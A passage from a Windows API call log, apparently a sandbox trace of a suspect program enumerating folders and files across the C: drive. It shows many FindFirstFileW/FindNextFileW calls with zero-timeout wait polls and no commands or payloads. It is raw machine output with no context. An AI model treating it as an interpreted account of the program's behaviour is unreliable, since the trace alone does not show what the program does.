ftLastAccessTime.dwLowDateTime=0x2dfdd420, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2dfdd420, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x5c0050, dwReserved1=0x63006c, cFileName="$Recycle.Bin", cAlternateFileName="")) returned 0x6f5f18 [0070.004] lstrlenW (lpString="$Recycle.Bin") returned 12 [0070.007] FindNextFileW (in: hFindFile=0x6f5f18, lpFindFileData=0x6f5cc0 | out: lpFindFileData=0x6f5cc0*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xac015040, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac30ebc0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac30ebc0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x5c0050, dwReserved1=0x63006c, cFileName="Boot", cAlternateFileName="")) returned 1 [0070.007] WaitForSingleObject (hHandle=0xbc, dwMilliseconds=0x0) returned 0x102 [0070.007] lstrlenW (lpString="Boot") returned 4 [0070.009] FindNextFileW (in: hFindFile=0x6f5f18, lpFindFileData=0x6f5cc0 | out: lpFindFileData=0x6f5cc0*(dwFileAttributes=0x27, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0f9880, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0x84a3bb2c, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x5db2a, dwReserved0=0x5c0050, dwReserved1=0x63006c, cFileName="bootmgr", cAlternateFileName="")) returned 1 [0070.010] WaitForSingleObject (hHandle=0xbc, dwMilliseconds=0x0) returned 0x102 [0070.010] lstrlenW (lpString="bootmgr") returned 7 [0070.010] FindNextFileW (in: hFindFile=0x6f5f18, lpFindFileData=0x6f5cc0 | out: lpFindFileData=0x6f5cc0*(dwFileAttributes=0x27, ftCreationTime.dwLowDateTime=0xac54a060, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac54a060, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac54a060, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x2000, dwReserved0=0x5c0050, dwReserved1=0x63006c, cFileName="BOOTSECT.BAK", cAlternateFileName="")) returned 1 [0070.010] WaitForSingleObject (hHandle=0xbc, dwMilliseconds=0x0) returned 0x102 [0070.010] lstrlenW (lpString="BOOTSECT.BAK") returned 12 [0070.012] FindNextFileW (in: hFindFile=0x6f5f18, lpFindFileData=0x6f5cc0 | out: lpFindFileData=0x6f5cc0*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xcd4f5c20, ftCreationTime.dwHighDateTime=0x1d305eb, ftLastAccessTime.dwLowDateTime=0xc182c7c0, ftLastAccessTime.dwHighDateTime=0x1d3373b, ftLastWriteTime.dwLowDateTime=0xc182c7c0, ftLastWriteTime.dwHighDateTime=0x1d3373b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x5c0050, dwReserved1=0x63006c, cFileName="Config.Msi", cAlternateFileName="")) returned 1 [0070.012] WaitForSingleObject (hHandle=0xbc, dwMilliseconds=0x0) returned 0x102 [0070.012] lstrlenW (lpString="Config.Msi") returned 10 [0070.015] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Config.Msi\\*", lpFindFileData=0x707bc0 | out: lpFindFileData=0x707bc0*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xcd4f5c20, ftCreationTime.dwHighDateTime=0x1d305eb, ftLastAccessTime.dwLowDateTime=0xc182c7c0, ftLastAccessTime.dwHighDateTime=0x1d3373b, ftLastWriteTime.dwLowDateTime=0xc182c7c0, ftLastWriteTime.dwHighDateTime=0x1d3373b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x6f4fd8 [0070.016] FindNextFileW (in: hFindFile=0x6f4fd8, lpFindFileData=0x707bc0 | out: lpFindFileData=0x707bc0*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xcd4f5c20, ftCreationTime.dwHighDateTime=0x1d305eb, ftLastAccessTime.dwLowDateTime=0xc182c7c0, ftLastAccessTime.dwHighDateTime=0x1d3373b, ftLastWriteTime.dwLowDateTime=0xc182c7c0, ftLastWriteTime.dwHighDateTime=0x1d3373b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0070.016] WaitForSingleObject (hHandle=0xbc, dwMilliseconds=0x0) returned 0x102 [0070.016] FindNextFileW (in: hFindFile=0x6f4fd8, lpFindFileData=0x707bc0 | out: lpFindFileData=0x707bc0*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xcd4f5c20, ftCreationTime.dwHighDateTime=0x1d305eb, ftLastAccessTime.dwLowDateTime=0xc182c7c0, ftLastAccessTime.dwHighDateTime=0x1d3373b, ftLastWriteTime.dwLowDateTime=0xc182c7c0, ftLastWriteTime.dwHighDateTime=0x1d3373b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0070.016] FindClose (in: hFindFile=0x6f4fd8 | out: hFindFile=0x6f4fd8) returned 1 [0070.016] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x707bc0 | out: hHeap=0x6d0000) returned 1 [0070.016] FindNextFileW (in: hFindFile=0x6f5f18, lpFindFileData=0x6f5cc0 | out: lpFindFileData=0x6f5cc0*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x307290f2, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0x307290f2, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x307290f2, ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x63006c, cFileName="Documents and Settings", cAlternateFileName="DOCUME~1")) returned 1 [0070.016] WaitForSingleObject (hHandle=0xbc, dwMilliseconds=0x0) returned 0x102 [0070.016] lstrlenW (lpString="Documents and Settings") returned 22 [0070.016] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Documents and Settings\\*", lpFindFileData=0x707bc0 | out: lpFindFileData=0x707bc0*(dwFileAttributes=0x6d00c4, ftCreationTime.dwLowDateTime=0x6f56f8, ftCreationTime.dwHighDateTime=0x1d305eb, ftLastAccessTime.dwLowDateTime=0xc182c7c0, ftLastAccessTime.dwHighDateTime=0x1d3373b, ftLastWriteTime.dwLowDateTime=0xc182c7c0, ftLastWriteTime.dwHighDateTime=0x1d3373b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0xffffffff [0070.019] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x707bc0 | out: hHeap=0x6d0000) returned 1 [0070.019] FindNextFileW (in: hFindFile=0x6f5f18, lpFindFileData=0x6f5cc0 | out: lpFindFileData=0x6f5cc0*(dwFileAttributes=0x2026, ftCreationTime.dwLowDateTime=0x56257dc0, ftCreationTime.dwHighDateTime=0x1d2de2a, ftLastAccessTime.dwLowDateTime=0x56257dc0, ftLastAccessTime.dwHighDateTime=0x1d2de2a, ftLastWriteTime.dwLowDateTime=0xae99ef60, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x5ff9d000, dwReserved0=0xa0000003, dwReserved1=0x63006c, cFileName="hiberfil.sys", cAlternateFileName="")) returned 1 [0070.019] WaitForSingleObject (hHandle=0xbc, dwMilliseconds=0x0) returned 0x102 [0070.019] lstrlenW (lpString="hiberfil.sys") returned 12 [0070.019] FindFirstFileW (in: lpFileName="\\\\?\\C:\\MSOCache\\*", lpFindFileData=0x707bc0 | out: lpFindFileData=0x707bc0*(dwFileAttributes=0x2013, ftCreationTime.dwLowDateTime=0xe7b42810, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xe7b42810, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xe7b42810, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x6f4fd8 [0070.019] FindNextFileW (in: hFindFile=0x6f4fd8, lpFindFileData=0x707bc0 | out: lpFindFileData=0x707bc0*(dwFileAttributes=0x2013, ftCreationTime.dwLowDateTime=0xe7b42810, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xe7b42810, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xe7b42810, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0070.020] WaitForSingleObject (hHandle=0xbc, dwMilliseconds=0x0) returned 0x102 [0070.020] FindNextFileW (in: hFindFile=0x6f4fd8, lpFindFileData=0x707bc0 | out: lpFindFileData=0x707bc0*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xe7b42810, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xa5cd3a40, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xa5cd3a40, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="All Users", cAlternateFileName="ALLUSE~1")) returned 1 [0070.020] WaitForSingleObject (hHandle=0xbc, dwMilliseconds=0x0) returned 0x102 [0070.020] lstrlenW (lpString="All Users") returned 9 [0070.020] FindFirstFileW (in: lpFileName="\\\\?\\C:\\MSOCache\\All Users\\*", lpFindFileData=0x709030 | out: lpFindFileData=0x709030*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xe7b42810, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xa5cd3a40, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xa5cd3a40, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x6f5018 [0070.025] FindNextFileW (in: hFindFile=0x6f5018, lpFindFileData=0x709030 | out: lpFindFileData=0x709030*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xe7b42810, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xa5cd3a40, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xa5cd3a40, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0070.025] WaitForSingleObject (hHandle=0xbc, dwMilliseconds=0x0) returned 0x102 [0070.026] FindNextFileW (in: hFindFile=0x6f5018, lpFindFileData=0x709030 | out: lpFindFileData=0x709030*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xecdfa490, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xee38cbf0, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xee38cbf0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="{90140000-0016-0409-1000-0000000FF1CE}-C", cAlternateFileName="{90140~3")) returned 1 [0070.026] WaitForSingleObject (hHandle=0xbc, dwMilliseconds=0x0) returned 0x102 [0070.026] lstrlenW (lpString="{90140000-0016-0409-1000-0000000FF1CE}-C") returned 40 [0070.026] FindFirstFileW (in: lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\*", lpFindFileData=0x70b2d0 | out: lpFindFileData=0x70b2d0*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xecdfa490, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xee38cbf0, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xee38cbf0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x6f5058 [0070.027] FindNextFileW (in: hFindFile=0x6f5058, lpFindFileData=0x70b2d0 | out: lpFindFileData=0x70b2d0*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xecdfa490, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xee38cbf0, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xee38cbf0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0070.027] WaitForSingleObject (hHandle=0xbc, dwMilliseconds=0x0) returned 0x102 [0070.027] FindNextFileW (in: hFindFile=0x6f5058, lpFindFileData=0x70b2d0 | out: lpFindFileData=0x70b2d0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x393df700, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x393df700, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xed035930, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x102fcbb, dwReserved0=0x0, dwReserved1=0x0, cFileName="ExcelLR.cab", cAlternateFileName="")) returned 1 [0070.027] WaitForSingleObject (hHandle=0xbc, dwMilliseconds=0x0) returned 0x102 [0070.027] lstrlenW (lpString="ExcelLR.cab") returned 11 [0070.770] FindClose (in: hFindFile=0x6f5058 | out: hFindFile=0x6f5058) returned 1 [0070.770] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x70b2d0 | out: hHeap=0x6d0000) returned 1 [0070.770] FindNextFileW (in: hFindFile=0x6f5018, lpFindFileData=0x709030 | out: lpFindFileData=0x709030*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xe8729610, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xecdfa490, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xecdfa490, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="{90140000-0018-0409-1000-0000000FF1CE}-C", cAlternateFileName="{90140~2")) returned 1 [0070.770] WaitForSingleObject (hHandle=0xbc, dwMilliseconds=0x0) returned 0x102 [0070.770] lstrlenW (lpString="{90140000-0018-0409-1000-0000000FF1CE}-C") returned 40 [0070.770] FindFirstFileW (in: lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\*", lpFindFileData=0x70d2f0 | out: lpFindFileData=0x70d2f0*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xe8729610, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xecdfa490, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xecdfa490, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xad7ca1bb, dwReserved1=0x13d91b14, cFileName=".", cAlternateFileName="")) returned 0x6f5058 [0070.821] FindNextFileW (in: hFindFile=0x6f5058, lpFindFileData=0x70d2f0 | out: lpFindFileData=0x70d2f0*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xe8729610, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xecdfa490, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xecdfa490, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xad7ca1bb, dwReserved1=0x13d91b14, cFileName="..", cAlternateFileName="")) returned 1 [0070.821] WaitForSingleObject (hHandle=0xbc, dwMilliseconds=0x0) returned 0x102 [0070.821] FindNextFileW (in: hFindFile=0x6f5058, lpFindFileData=0x70d2f0 | out: lpFindFileData=0x70d2f0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x3e02ab00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x3e02ab00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xe874f770, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x263400, dwReserved0=0xad7ca1bb, dwReserved1=0x13d91b14, cFileName="PowerPointMUI.msi", cAlternateFileName="POWERP~1.MSI")) returned 1 [0070.821] WaitForSingleObject (hHandle=0xbc, dwMilliseconds=0x0) returned 0x102 [0070.821] lstrlenW (lpString="PowerPointMUI.msi") returned 17 [0070.822] FindClose (in: hFindFile=0x6f5058 | out: hFindFile=0x6f5058) returned 1 [0070.822] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x70d2f0 | out: hHeap=0x6d0000) returned 1 [0070.822] FindNextFileW (in: hFindFile=0x6f5018, lpFindFileData=0x709030 | out: lpFindFileData=0x709030*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xfc3e6570, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xfc8a9170, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xfc8a9170, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="{90140000-0019-0409-1000-0000000FF1CE}-C", cAlternateFileName="{9877A~1")) returned 1 [0070.822] WaitForSingleObject (hHandle=0xbc, dwMilliseconds=0x0) returned 0x102 [0070.822] lstrlenW (lpString="{90140000-0019-0409-1000-0000000FF1CE}-C") returned 40 [0070.823] FindFirstFileW (in: lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\*", lpFindFileData=0x70bf20 | out: lpFindFileData=0x70bf20*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xfc3e6570, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xfc8a9170, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xfc8a9170, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x6f5058 [0070.859] FindNextFileW (in: hFindFile=0x6f5058, lpFindFileData=0x70bf20 | out: lpFindFileData=0x70bf20*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xfc3e6570, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xfc8a9170, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xfc8a9170, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0070.860] WaitForSingleObject (hHandle=0xbc, dwMilliseconds=0x0) returned 0x102 [0070.860] FindNextFileW (in: hFindFile=0x6f5058, lpFindFileData=0x70bf20 | out: lpFindFileData=0x70bf20*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x3e02ab00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x3e02ab00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xfc40b730, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x265c00, dwReserved0=0x0, dwReserved1=0x0, cFileName="PublisherMUI.msi", cAlternateFileName="PUBLIS~1.MSI")) returned 1 [0070.860] WaitForSingleObject (hHandle=0xbc, dwMilliseconds=0x0) returned 0x102 [0070.860] lstrlenW (lpString="PublisherMUI.msi") returned 16 [0070.860] FindClose (in: hFindFile=0x6f5058 | out: hFindFile=0x6f5058) returned 1 [0070.861] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x70bf20 | out: hHeap=0x6d0000) returned 1 [0070.861] FindNextFileW (in: hFindFile=0x6f5018, lpFindFileData=0x709030 | out: lpFindFileData=0x709030*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xee829690, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xf00dbad0, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xf00dbad0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="{90140000-001A-0409-1000-0000000FF1CE}-C", cAlternateFileName="{9765F~1")) returned 1 [0070.861] WaitForSingleObject (hHandle=0xbc, dwMilliseconds=0x0) returned 0x102 [0070.861] lstrlenW (lpString="{90140000-001A-0409-1000-0000000FF1CE}-C") returned 40 [0070.861] FindFirstFileW (in: lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\*", lpFindFileData=0x70bf20 | out: lpFindFileData=0x70bf20*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xee829690, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xf00dbad0, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xf00dbad0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x70c5e0 [0070.933] FindNextFileW (in: hFindFile=0x70c5e0, lpFindFileData=0x70bf20 | out: lpFindFileData=0x70bf20*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xee829690, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xf00dbad0, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xf00dbad0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0070.933] WaitForSingleObject (hHandle=0xbc, dwMilliseconds=0x0) returned 0x102 [0070.933] FindNextFileW (in: hFindFile=0x70c5e0, lpFindFileData=0x70bf20 | out: lpFindFileData=0x70bf20*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x3a6f2400, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x3a6f2400, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xeebe0180, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0xe21fcc, dwReserved0=0x0, dwReserved1=0x0, cFileName="OutlkLR.cab", cAlternateFileName="")) returned 1 [0070.933] WaitForSingleObject (hHandle=0xbc, dwMilliseconds=0x0) returned 0x102 [0070.934] lstrlenW (lpString="OutlkLR.cab") returned 11 [0070.934] FindClose (in: hFindFile=0x70c5e0 | out: hFindFile=0x70c5e0) returned 1 [0070.935] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x70bf20 | out: hHeap=0x6d0000) returned 1 [0070.935] FindNextFileW (in: hFindFile=0x6f5018, lpFindFileData=0x709030 | out: lpFindFileData=0x709030*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xfc8a9170, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xfe076d70, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xfe076d70, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="{90140000-001B-0409-1000-0000000FF1CE}-C", cAlternateFileName="{94E50~1")) returned 1 [0070.935] WaitForSingleObject (hHandle=0xbc, dwMilliseconds=0x0) returned 0x102 [0070.935] lstrlenW (lpString="{90140000-001B-0409-1000-0000000FF1CE}-C") returned 40 [0070.936] FindFirstFileW (in: lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\*", lpFindFileData=0x70b4c8 | out: lpFindFileData=0x70b4c8*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xfc8a9170, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xfe076d70, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xfe076d70, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xc8822a7d, dwReserved1=0x24a39153, cFileName=".", cAlternateFileName="")) returned 0x6f5058 [0070.969] FindNextFileW (in: hFindFile=0x6f5058, lpFindFileData=0x70b4c8 | out: lpFindFileData=0x70b4c8*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xfc8a9170, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xfe076d70, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xfe076d70, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xc8822a7d, dwReserved1=0x24a39153, cFileName="..", cAlternateFileName="")) returned 1 [0070.969] WaitForSingleObject (hHandle=0xbc, dwMilliseconds=0x0) returned 0x102 [0070.969] FindNextFileW (in: hFindFile=0x6f5058, lpFindFileData=0x70b4c8 | out: lpFindFileData=0x70b4c8*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x43f88c00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x43f88c00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xfe076d70, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x978, dwReserved0=0xc8822a7d, dwReserved1=0x24a39153, cFileName="Setup.xml", cAlternateFileName="")) returned 1 [0070.969] WaitForSingleObject (hHandle=0xbc, dwMilliseconds=0x0) returned 0x102 [0070.969] lstrlenW (lpString="Setup.xml") returned 9 [0070.969] FindClose (in: hFindFile=0x6f5058 | out: hFindFile=0x6f5058) returned 1 [0070.969] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x70b4c8 | out: hHeap=0x6d0000) returned 1 [0070.969] FindNextFileW (in: hFindFile=0x6f5018, lpFindFileData=0x709030 | out: lpFindFileData=0x709030*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xf00dbad0, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xf58c8770, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xf58c8770, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="{90140000-002C-0409-1000-0000000FF1CE}-C", cAlternateFileName="{92787~1")) returned 1 [0070.969] WaitForSingleObject (hHandle=0xbc, dwMilliseconds=0x0) returned 0x102 [0070.969] lstrlenW (lpString="{90140000-002C-0409-1000-0000000FF1CE}-C") returned 40 [0070.969] FindFirstFileW (in: lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\*", lpFindFileData=0x70b4c8 | out: lpFindFileData=0x70b4c8*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xf00dbad0, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xf58c8770, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xf58c8770, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xc8822a7d, dwReserved1=0x24a39153, cFileName=".", 